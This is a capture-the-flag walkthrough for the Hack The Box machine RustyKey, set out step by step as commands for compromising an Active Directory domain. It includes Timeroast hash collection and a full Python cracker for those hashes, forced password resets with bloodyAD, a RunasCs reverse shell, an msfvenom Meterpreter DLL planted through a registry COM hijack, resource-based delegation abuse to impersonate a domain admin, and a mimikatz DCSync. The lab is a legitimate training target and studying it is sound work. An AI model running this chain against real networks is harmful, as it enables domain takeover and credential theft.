Rusty Key (English)
https://app.hackthebox.com/machines/RustyKey
IP
10.10.11.75
Domain/Hosts
dc.rustykey.htb rustykey.htb
/etc/krb5.conf
[libdefaults]
default_realm = RUSTYKEY.HTB
dns_lookup_realm = false
dns_lookup_kdc = false
ticket_lifetime = 24h
forwardable = yes
default_tkt_enctypes = aes256-cts-hmac-sha1-96 aes128-cts-hmac-sha1-96
default_tgs_enctypes = aes256-cts-hmac-sha1-96 aes128-cts-hmac-sha1-96
permitted_enctypes = aes256-cts-hmac-sha1-96 aes128-cts-hmac-sha1-96
[realms]
RUSTYKEY.HTB = {
kdc = 10.10.11.75
}
[domain_realm]
.rustykey.htb = RUSTYKEY.HTB
rustykey.htb = RUSTYKEY.HTB
Nmap Results
User Enumeration
Note
Although many Active Directory environments require Kerberos-only authentication, the LDAP server in this environment permits a Simple Bind with username and password. (A simple bind over plain ldap:// sends the password in cleartext; prefer ldaps:// or StartTLS where the server offers it.)
With the following command we successfully queried all user objects including their userPrincipalName:
ldapsearch -x -H ldap://10.10.11.75 -D 'rr.parker@rustykey.htb' -w '8#t5HE8L!W3A' -b 'dc=rustykey,dc=htb' "(objectClass=user)" userPrincipalName
BloodHound Enumeration
We request a TGT via Kerberos
getTGT.py -dc-ip 10.10.11.75 rustykey.htb/rr.parker:'8#t5HE8L!W3A'
We set the Kerberos ticket as the active session
export KRB5CCNAME=rr.parker.ccache
We are checking the active Kerberos ticket
klist
We run BloodHound with Kerberos authentication
bloodhound-python -u 'rr.parker' -p '8#t5HE8L!W3A' -c All -d rustykey.htb -ns 10.10.11.75 --zip -k
The computer account IT-COMPUTER3$ can add itself to the HELPDESK group.
The HELPDESK group can change the password of the following four users:
bb.morgan
gg.anderson
dd.ali
ee.reed
MM.TURNER has AddAllowedToAct on DC.RUSTYKEY.HTB (i.e. can configure resource-based constrained delegation on the DC).
These 3 users can connect via evil-winrm according to BloodHound (in practice the WinRM login as ee.reed fails, see step 2):
bb.morgan
gg.anderson
ee.reed
Timeroast IT-COMPUTER3$
Info
Download the scripts here: https://github.com/SecuraBV/Timeroast
Collect the MS-SNTP authenticator hashes of the computer accounts (no credentials needed; the nxc module below is an alternative):
python3 timeroast.py 10.10.11.75 -o rustykey.hashes
Cracking the hashes
python3 timecrack.py rustykey.hashes /usr/share/wordlists/rockyou.txt
The password Rusty88! was found for RID 1125.
In BloodHound we see that RID 1125 belongs to IT-COMPUTER3$.
timecrack.py (modified version: the dictionary is opened as latin-1 to avoid the UTF-8 decode error with rockyou.txt)
#!/usr/bin/env python3
"""Perform a simple dictionary attack against the output of timeroast.py. Necessary because the NTP 'hash' format
unfortunately does not fit into Hashcat or John right now.

Not even remotely optimized, but still useful for cracking legacy default passwords (where the password is the computer
name) or specific default passwords that are popular in an organisation.
"""
from binascii import hexlify, unhexlify
from argparse import ArgumentParser, FileType, RawDescriptionHelpFormatter
from typing import TextIO, Generator, Tuple
import hashlib, sys, re

# One line per computer account: <RID>:$sntp-ms$<MD5 authenticator, 32 hex>$<48-byte NTP reply, 96 hex>
HASH_FORMAT = r'^(?P<rid>\d+):\$sntp-ms\$(?P<hashval>[0-9a-f]{32})\$(?P<salt>[0-9a-f]{96})$'


def md4(data: bytes) -> bytes:
    try:
        return hashlib.new('md4', data).digest()
    except ValueError:
        from md4 import MD4  # Fallback to the pure-Python md4 module shipped with Timeroast if OpenSSL has no MD4
        return MD4(data).bytes()


def compute_hash(password: str, salt: bytes) -> bytes:
    """Compute a legacy NTP authenticator 'hash': MD5(NT hash of the password || NTP reply)."""
    return hashlib.md5(md4(password.encode('utf-16le')) + salt).digest()


def try_crack(hashfile: TextIO, dictfile: TextIO) -> Generator[Tuple[int, str], None, None]:
    hashes = []
    for line in hashfile:
        line = line.strip()
        if line:
            m = re.match(HASH_FORMAT, line)
            if not m:
                print(f'ERROR: invalid hash format: {line}', file=sys.stderr)
                sys.exit(1)
            rid, hashval, salt = m.group('rid', 'hashval', 'salt')
            hashes.append((int(rid), unhexlify(hashval), unhexlify(salt)))

    # Every candidate is tried against every captured hash (each one carries its own salt).
    for password in dictfile:
        password = password.strip()
        for rid, hashval, salt in hashes:
            if compute_hash(password, salt) == hashval:
                yield rid, password


def main():
    argparser = ArgumentParser(formatter_class=RawDescriptionHelpFormatter, description=\
"""Perform a simple dictionary attack against the output of timeroast.py.
Not even remotely optimized, but still useful for cracking legacy default
passwords (where the password is the computer name) or specific default
passwords that are popular in an organisation.
""")
    argparser.add_argument('hashes', type=FileType('r'), help='Output of timeroast.py')
    # The modification: rockyou.txt contains bytes that are not valid UTF-8, so the dictionary
    # is opened as latin-1 instead of the default encoding to avoid a UnicodeDecodeError.
    argparser.add_argument('dictionary', type=lambda f: open(f, encoding='latin-1'),
                           help='Line-delimited password dictionary (e.g. rockyou.txt)')
    args = argparser.parse_args()

    crackcount = 0
    for rid, password in try_crack(args.hashes, args.dictionary):
        print(f'[+] Cracked RID {rid} password: {password}')
        crackcount += 1
    print(f'\n{crackcount} passwords recovered.')


if __name__ == '__main__':
    main()
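As an added example (my own code, not from these notes or the SecuraBV Timeroast repository), the block below rebuilds the MS-SNTP authenticator that timecrack.py checks, MD5(NT-hash(password) || 48-byte NTP reply), with a pure-Python MD4 so it also runs where OpenSSL 3 has disabled hashlib's md4, and handles the dictionary-encoding problem the modified script works around differently: instead of reading the whole wordlist as latin-1, it tries UTF-8 per line and falls back to latin-1 only for lines that are not valid UTF-8 (rockyou.txt is known to contain such lines), so multibyte UTF-8 passwords still hash correctly. The RIDs, NTP replies, passwords and the tiny dictionary are constructed for the demo, not captured from the box.

```python
import hashlib
import re
import struct
from typing import Dict, Iterable, Iterator, List, Tuple

# Same line layout timeroast.py emits: <RID>:$sntp-ms$<MD5 hex>$<48-byte NTP reply hex>
HASH_RE = re.compile(r'^(?P<rid>\d+):\$sntp-ms\$(?P<hashval>[0-9a-f]{32})\$(?P<salt>[0-9a-f]{96})$')


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); used for the NT hash because hashlib's md4 is often unavailable."""
    mask = 0xFFFFFFFF
    msg = bytearray(data) + b'\x80'
    while len(msg) % 64 != 56:
        msg += b'\x00'
    msg += struct.pack('<Q', (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    k = lambda x, y, z: x ^ y ^ z
    r2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack('<16I', msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):  # round 1
            a = _rotl((a + f(b, c, d) + x[i]) & mask, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            a = _rotl((a + g(b, c, d) + x[r2[i]] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            a = _rotl((a + k(b, c, d) + x[r3[i]] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(v + w) & mask for v, w in zip(h, (a, b, c, d))]
    return struct.pack('<4I', *h)


def ntp_authenticator(password: str, salt: bytes) -> bytes:
    """Legacy MS-SNTP authenticator: MD5(NT hash of the machine password || 48-byte NTP reply)."""
    return hashlib.md5(md4(password.encode('utf-16le')) + salt).digest()


def timeroast_line(rid: int, password: str, salt: bytes) -> str:
    """Build one output line in timeroast.py format (used here only to construct sample data)."""
    return f'{rid}:$sntp-ms${ntp_authenticator(password, salt).hex()}${salt.hex()}'


def parse_hashes(lines: Iterable[str]) -> List[Tuple[int, bytes, bytes]]:
    out = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        m = HASH_RE.match(line)
        if not m:
            raise ValueError(f'invalid timeroast line: {line!r}')
        out.append((int(m['rid']), bytes.fromhex(m['hashval']), bytes.fromhex(m['salt'])))
    return out


def candidates(raw: bytes) -> Iterator[str]:
    """Decode the wordlist per line: UTF-8 when valid, latin-1 otherwise.
    Reading everything as latin-1 (the page's fix) never crashes, but turns a UTF-8 'é'
    into two characters and so misses passwords containing non-ASCII letters."""
    for line in raw.split(b'\n'):
        line = line.rstrip(b'\r')
        if not line:
            continue
        try:
            yield line.decode('utf-8')
        except UnicodeDecodeError:
            yield line.decode('latin-1')


def crack(hash_lines: Iterable[str], raw_dict: bytes) -> Dict[int, str]:
    """Try every candidate against every captured hash (each has its own salt)."""
    targets = parse_hashes(hash_lines)
    found: Dict[int, str] = {}
    for pw in candidates(raw_dict):
        for rid, hashval, salt in targets:
            if rid not in found and ntp_authenticator(pw, salt) == hashval:
                found[rid] = pw
    return found


# Constructed sample data (not captured from the box): two fake NTP replies and passwords,
# plus a dictionary containing one UTF-8 line and one line that is not valid UTF-8.
SALT_A = bytes(range(48))
SALT_B = bytes(range(48, 96))
SAMPLE_HASHES = [timeroast_line(1125, 'Rusty88!', SALT_A), timeroast_line(1126, 'café', SALT_B)]
SAMPLE_DICT = b'123456\nRusty88!\ncaf\xc3\xa9\nbad\xff\xfeline\n'


def demo() -> Dict[int, str]:
    return crack(SAMPLE_HASHES, SAMPLE_DICT)


if __name__ == '__main__':
    for rid, pw in demo().items():
        print(f'[+] Cracked RID {rid} password: {pw}')
```

Run it directly to see both entries cracked: the Rusty88! line mirrors the RID 1125 result above, the café line exercises the UTF-8 path that a latin-1-only read would miss, and the invalid-UTF-8 line no longer aborts the run.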
Alternative with nxc
Start Timeroast attack
nxc smb 10.10.11.75 -M timeroast
Exploit Chain
1. bb.morgan
We request a TGT for the machine account IT-COMPUTER3$
getTGT.py -dc-ip 10.10.11.75 'rustykey.htb/IT-COMPUTER3$:Rusty88!'
We set the machine account's Kerberos ticket as default
export KRB5CCNAME=IT-COMPUTER3$.ccache
We add the machine account to the group 'HELPDESK'
bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -k add groupMember 'HELPDESK' 'IT-COMPUTER3$'
We remove the group 'IT' from the 'Protected Objects' group
bloodyAD --host dc.rustykey.htb -k -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' remove groupMember 'Protected Objects' 'IT'
We set the password of bb.morgan to a new, known password
bloodyAD --kerberos --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' set password bb.morgan 'pa$$w0rd'
We request a TGT for bb.morgan with the new password
getTGT.py -dc-ip 10.10.11.75 'rustykey.htb/bb.morgan:pa$$w0rd'
We set the Kerberos ticket of bb.morgan as active
export KRB5CCNAME=bb.morgan.ccache
We start a WinRM session as bb.morgan on the domain controller
evil-winrm -i dc.rustykey.htb -u bb.morgan -r rustykey.htb
User Flag 🏁
We retrieve the user.txt flag
type C:\Users\bb.morgan\Desktop\user.txt
PDF File
In bb.morgan's home directory we find a .pdf file.
The document describes that the Support group temporarily receives extended rights, such as access to registry keys (it is not entirely clear what exactly is meant).
2. ee.reed
We activate the Kerberos ticket for IT-COMPUTER3$
export KRB5CCNAME=IT-COMPUTER3$.ccache
We add IT-COMPUTER3$ to the HELPDESK group
bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -k add groupMember
'HELPDESK' IT-COMPUTER3$
We remove SUPPORT from the 'Protected Objects' group (ee.reed is a member of the SUPPORT group)
bloodyAD --kerberos --dc-ip 10.10.11.75 --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' remove groupMember "CN=PROTECTED OBJECTS,CN=USERS,DC=RUSTYKEY,DC=HTB" "SUPPORT"
We set a new password for the user ee.reed
bloodyAD --kerberos --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' set password ee.reed 'Password123!'
An evil-winrm shell is not possible with user ee.reed ❌
evil-winrm -i dc.rustykey.htb -u ee.reed -r rustykey.htb
Important
Since we cannot establish an evil-winrm shell as ee.reed, we use RunasCs.exe from our existing shell as bb.morgan.
3. RunasCs.exe, i.e. access to mm.turner
We activate bb.morgan's Kerberos ticket again
export KRB5CCNAME=bb.morgan.ccache
We restart a WinRM session as bb.morgan on the domain controller
evil-winrm -i dc.rustykey.htb -u bb.morgan -r rustykey.htb
We create the directory for our tools on the target system📁
mkdir C:\Tools
We change to the created tool directory 📁
cd C:\Tools
We upload RunasCs.exe to the target
upload RunasCs.exe
Start listener
nc -lvnp 4444
We use RunasCs for a reverse shell with the privileges of ee.reed (replace 10.10.16.x with your own VPN address)
.\RunasCs.exe ee.reed Password123! cmd.exe -r 10.10.16.x:4444
We now have a shell as user ee.reed
mm.turner
We build a DLL-based Meterpreter payload to be loaded via COM hijacking
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.x LPORT=4444 -f dll -o rev.dll
Prepare the handler in Metasploit (stop the nc listener from the previous step first, both use port 4444, or pick a different port)
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.16.x; set LPORT 4444; exploit"
Change Dir
cd C:\Tools
Upload the DLL (use the bb.morgan evil-winrm shell)
upload rev.dll
Registry manipulation (COM hijacking, done from the ee.reed shell, whose SUPPORT group has the registry rights mentioned in the PDF): we point the InprocServer32 default value of CLSID {23170F69-40C1-278A-1000-000100020000} (the 7-Zip shell extension) at our DLL, so the next process that instantiates this COM object loads rev.dll. Note the existing default value first so the key can be restored afterwards.
reg add "HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" /ve /d "C:\Tools\rev.dll" /f
After a few seconds we get a reverse shell (be quick, the session is torn down almost immediately)
Switch to PowerShell
powershell
Set up resource-based constrained delegation from the DC to our machine account. This works because the shell runs as mm.turner, who has AddAllowedToAct on DC.RUSTYKEY.HTB; the cmdlet writes msDS-AllowedToActOnBehalfOfOtherIdentity on the DC computer object (the ActiveDirectory module is available on the DC)
Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount IT-COMPUTER3$
4. PRIVESC
We impersonate the domain admin backupadmin via RBCD (S4U2Self followed by S4U2Proxy) and obtain a service ticket for CIFS on the DC. If this fails, check whether backupadmin is in Protected Users or marked "account is sensitive and cannot be delegated"; such accounts cannot be impersonated this way.
impacket-getST -spn 'cifs/DC.rustykey.htb' -impersonate backupadmin -dc-ip 10.10.11.75 -k 'RUSTYKEY.HTB/IT-COMPUTER3$:Rusty88!'
We export the received ticket as the Kerberos cache
export KRB5CCNAME=backupadmin@cifs_DC.rustykey.htb@RUSTYKEY.HTB.ccache
We run wmiexec.py to get a shell as backupadmin on the DC
wmiexec.py -k -no-pass 'RUSTYKEY.HTB/backupadmin@dc.rustykey.htb'
Root Flag
We retrieve the root.txt flag
type C:\Users\Administrator\Desktop\root.txt
Alternative: DCSync via mimikatz
We set the Kerberos ticket for backupadmin
export KRB5CCNAME=backupadmin@cifs_DC.rustykey.htb@RUSTYKEY.HTB.ccache
We start a remote session as backupadmin via psexec.py (yields a SYSTEM shell on the DC)
psexec.py -k -no-pass 'RUSTYKEY.HTB/backupadmin@dc.rustykey.htb'
We start Mimikatz (upload mimikatz.exe beforehand, e.g. with the bb.morgan evil-winrm session)
.\mimikatz.exe
We extract the Administrator's NTLM hash using DCSync
lsadump::dcsync /domain:RUSTYKEY.HTB /user:Administrator
We use the Administrator NTLM hash to request a TGT (overpass-the-hash)
impacket-getTGT 'rustykey.htb/Administrator' -hashes :HASH -dc-ip 10.10.11.75
We activate the Kerberos ticket for the Administrator
export KRB5CCNAME=Administrator.ccache
We log in as Domain Administrator via Evil-WinRM
evil-winrm -i dc.rustykey.htb -r RUSTYKEY.HTB